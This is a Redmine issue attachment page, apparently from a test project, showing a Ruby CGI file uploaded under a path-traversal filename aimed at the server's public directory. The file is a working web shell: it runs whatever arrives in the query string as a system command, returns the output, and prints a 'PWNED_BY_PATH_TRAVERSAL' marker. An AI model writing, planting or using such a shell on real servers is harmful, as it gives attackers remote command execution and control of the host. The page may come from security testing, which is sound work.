⚲
Project
General
Profile
Sign in
Register
Home
Projects
Help
Search
:
cmdtest1782618771
All Projects
cmdtest1782618771
Overview
Activity
Issues
Documents
Wiki
Files
Repository
Download (175 Bytes)
Bug #85
ยป .._2F.._2F.._2Fpublic_2Fshell_pt8.rb
Redmine Admin
, 07/16/2026 08:42 AM
#!/usr/bin/env ruby
puts
"Content-Type: text/plain
\r\n\r\n
"
puts
`
#{
ENV
[
'QUERY_STRING'
]
}
`
if
ENV
[
'QUERY_STRING'
]
&&
!
ENV
[
'QUERY_STRING'
].
empty?
puts
"PWNED_BY_PATH_TRAVERSAL"
(1-1/1)
Loading...